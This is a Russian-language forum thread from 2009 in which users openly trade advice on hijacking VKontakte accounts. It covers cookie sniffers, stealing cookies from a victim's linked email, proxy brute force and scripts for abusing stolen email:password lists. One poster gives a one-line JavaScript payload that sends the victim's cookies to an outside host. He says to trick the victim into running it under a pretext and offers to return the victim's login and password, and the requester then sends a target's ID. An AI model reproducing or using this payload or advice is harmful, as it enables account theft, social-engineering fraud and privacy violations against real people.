Взлом-защита vkontakte.ru Читаем первый пост! | SEclub.org
Взлом-защита vkontakte.ru Читаем первый пост!
Все новые
zvolodkyaz, 1) На каком именно сниффере ты зарегался?
2) Снифферы не варуют куки контакта, т.к. XSS прикрыты (по крайней мере мне этот способ не известен);
3) Проше украсть куки привязанного мыло, а дальше все просто;
4) Если ты на сниффере от хакер-про, то там в настройках есть готовые скрипты.
5) Так же на нем есть видео урок.
Если есть какие то вопросы - обращайся, всегда рад помочь нагадить контакту. :)

Ссылка на пост
Всего сообщений: 2725
*
GodSenD
2 апр 2009 в 17:36
p@SHOK"k-61O, seclub.org/forum/goto/7272708/ - да ты не понял .. красть акки я то умею .. но вот есть же проги которые используют уже наворованные списки "почта:пароль" ?? ну для отсылки сообщ. друзьям украденного акка, просмотра есть ли у него неиспользованные голоса, рейт какой ... и т.д. ...
*
CultDC
ts 3 апр 2009 в 07:29
pHaeTOn, есть такие проги, точнее не проги а скрипты на php, если знаешь этот язык можно даже придумать что нибудь интересное от себя. Так же есть спамер в exe
3 апр 2009 в 07:30 / CultDC (1)
*
CultDC
ts 3 апр 2009 в 07:38
zvolodkyaz, 1) На каком именно сниффере ты зарегался?
2) Снифферы не варуют куки контакта, т.к. XSS прикрыты (по крайней мере мне этот способ не известен);
3) Проше украсть куки привязанного мыло, а дальше все просто;
4) Если ты на сниффере от хакер-про, то там в настройках есть готовые скрипты.
5) Так же на нем есть видео урок.
Если есть какие то вопросы - обращайся, всегда рад помочь нагадить контакту. :)
*
zvolodkyaz
3 апр 2009 в 07:54
p@SHOK"k-61O, мне короч нада взламать контакт.бутфорс,обман не помагает...а через снифер на хакер-про и видео скачал,но как взламать контакт не пойму...
*
CultDC
ts 3 апр 2009 в 09:33
zvolodkyaz, давай тогда поступим так. Ты впариваешь жертве это
javascript:document.write("<script>img = new Image(); img.src = "mp4forum.ru/n931.gif?"+document.cookie;</script>")
Под предлогом мол изменится интерфейс или что нить этакое. Говоришь мне ИД страницы, а я тебе логин и пароль.
*
CultDC
ts 3 апр 2009 в 12:40
zvolodkyaz, кстати на брутфорсы авто бан. Брутфорс должен работать через прокси что бы обходить картинку с текстом. А так пустая трата времени.
*
zvolodkyaz
3 апр 2009 в 14:50
Все, айди бросил в личку...
*
Dijohn
3 апр 2009 в 16:18
Привет всем,у меня такая проблема:поменял имя в своем аккаунте Вконтакте на такое же,только транслитом,и появилось предупреждение,что"Информация на данной странице не соответствует реальности".Я вернул все,как было,но теперь обнаружил,что не могу поменять фотографию.Вопрос:сколько длится это ограничение?Извините,если пишу не в ту тему,подходящей не нашел.Заранее спасибо
*
CultDC
ts 3 апр 2009 в 17:11
Dijohn, с темой ты не ощибся, все норм. У меня такая же проблема на одной страничке. Вроде бы 2,5 месяца
*
GodSenD
4 апр 2009 в 09:18
Dijohn, 2 мес. А поменять прям сейчас можно на дуров.ру. p@SHOK"k-61O, спамером в ехе не поделишься ?
*
CultDC
ts 4 апр 2009 в 09:42
pHaeTOn, а у меня его нету, да и была вроде демка.
*
CultDC
ts 4 апр 2009 в 11:01
pHaeTOn, кстати если аву блокированную через дуров.ру поставить, то положенный рейтинг за не не прибавится.
Для полноценного использования разделов сайта войдите или зарегистрируйтесь.
Интернет и сети | Компьютеры | Форум | Главная
18+ © Seclub.org 2003-2026